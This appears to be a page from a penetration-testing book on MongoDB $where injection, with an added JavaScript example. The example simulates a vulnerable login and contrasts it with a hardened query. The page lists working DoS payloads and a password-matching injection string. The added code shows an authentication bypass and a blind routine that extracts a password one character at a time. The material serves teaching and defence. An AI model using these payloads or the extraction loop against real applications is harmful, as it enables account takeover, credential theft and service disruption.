Page 100 - Hands-On Bug Hunting for Penetration Testers
SQL, Code Injection, and Scanners Chapter 5
You can get more complicated with the expression, of course. Ultimately, if the data is not
properly sanitized, MongoDB's $where clause is capable of inserting and executing
entire scripts written in JavaScript. Unlike SQL, which is declarative and somewhat limited
as a language, MongoDB's support for arbitrary JavaScript conditionals inside $where exposes
it to exploits that draw on the language's full range of features.
You can see patterns in how this type of vulnerability is commonly exploited. On GitHub
and other code-sharing sites, you can find lists enumerating different malicious MongoDB
$where inputs, like this one: https://github.com/cr0hn/nosqlinjection_wordlists.
Some inputs are designed as Denial-of-Service (DoS) and resource consumption attacks (the
%20 is a URL-encoded space; the second payload busy-waits for five seconds instead of
relying on a sleep() function being available):
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
While others aim for password discovery, here by appending a regex test on the password
field to whatever the application already put in the clause and commenting out the rest of it
with // (the trailing +%00 is a URL-encoded space and null byte, intended to truncate
anything that follows):
' && this.password.match(/.*/)//+%00
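The following is an added example, not code from the book or from the wordlist repository, showing what the password-discovery payload above does to a $where clause built by string concatenation, and how narrowing its /.*/ to a growing anchored prefix turns a yes/no login response into a character-by-character extraction oracle. MongoDB evaluates $where as JavaScript once per document with `this` bound to that document; that evaluation is simulated here with `new Function()` so the code runs without a database (the simulation is itself code execution on attacker-controlled strings and is only a stand-in for the server). The users collection, field names, login functions and alphabet are constructed assumptions.

```javascript
// Added example (not from the book): a login check that builds a MongoDB $where string
// by concatenation, the page's password payload run against it, and the hardened form.
// The server-side JavaScript evaluation is simulated with new Function(); collection,
// field names and alphabet are constructed for the example.

const USERS = [
  { username: "alice", password: "s3cret!" },
  { username: "bob", password: "hunter2" },
];
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789!";

// Vulnerable: request values are spliced straight into the $where expression.
function buildWhereVulnerable(username, password) {
  return `this.username == '${username}' && this.password == '${password}'`;
}

// Simulated server-side evaluation, one call per document with `this` bound to it.
// The newline after the expression matters: a payload ending in // comments out the
// rest of its line, exactly as it does inside MongoDB's $where.
function runWhere(whereExpr, collection) {
  const predicate = new Function(`return (\n${whereExpr}\n);`);
  return collection.filter((doc) => predicate.call(doc));
}

function loginVulnerable(username, password) {
  return runWhere(buildWhereVulnerable(username, password), USERS);
}

// Hardened: values are passed as data, never as code, and their types are pinned so an
// object such as {"$ne": ""} arriving in a JSON body cannot smuggle an operator in.
function buildQuerySafe(username, password) {
  if (typeof username !== "string" || typeof password !== "string") {
    throw new TypeError("credentials must be strings");
  }
  return { username, password };
}

function loginSafe(username, password) {
  const q = buildQuerySafe(username, password);
  return USERS.filter((d) => d.username === q.username && d.password === q.password);
}

function regexEscape(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/]/g, "\\$&");
}

// Blind extraction: the attacker only observes whether the login matched a document.
// The page's payload ' && this.password.match(/.*/)// becomes an oracle once /.*/ is
// replaced by /^<known prefix><candidate>/; each round recovers one more character.
function extractPassword(username, alphabet) {
  let recovered = "";
  for (;;) {
    let next = null;
    for (const ch of alphabet) {
      const probe = `${username}' && this.password.match(/^${regexEscape(recovered + ch)}/)//`;
      if (loginVulnerable(probe, "irrelevant").length > 0) {
        next = ch;
        break;
      }
    }
    if (next === null) return recovered; // no character extends the prefix: done
    recovered += next;
  }
}
```

Against `loginVulnerable`, the username `alice' && this.password.match(/.*/)//` logs in as alice with any password, and `extractPassword("alice", ALPHABET)` recovers the full password in a number of requests linear in its length times the alphabet size. The same inputs against `loginSafe` match nothing, because the quote and the JavaScript are compared as literal characters of a username rather than interpreted.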
Another vector for code injection within MongoDB is available within PHP
implementations. Since $where is not only a MongoDB reserved word but also a syntactically
valid PHP variable name, an attacker can potentially submit code into a query by getting the
application to create a $where variable from request input (as happens, for example, when
user-controlled arrays are passed through extract() or register_globals-style behaviour is in
effect).
But regardless of the implementation, these attacks all rely on the same principle as general
injection attacks: unsanitized data being mistaken for and executed as an application
command.
As MongoDB shows, the principle of malformed input changing the logic of a developer's
code is a problem that extends well beyond SQL or any other specific language, framework,
or tool.
SQLi – An End-to-End Example
Returning to Arachni, let's point it at webscantest.com/datastore and see what we
find, kicking it off with a scan against https://webscantest.com/datastore.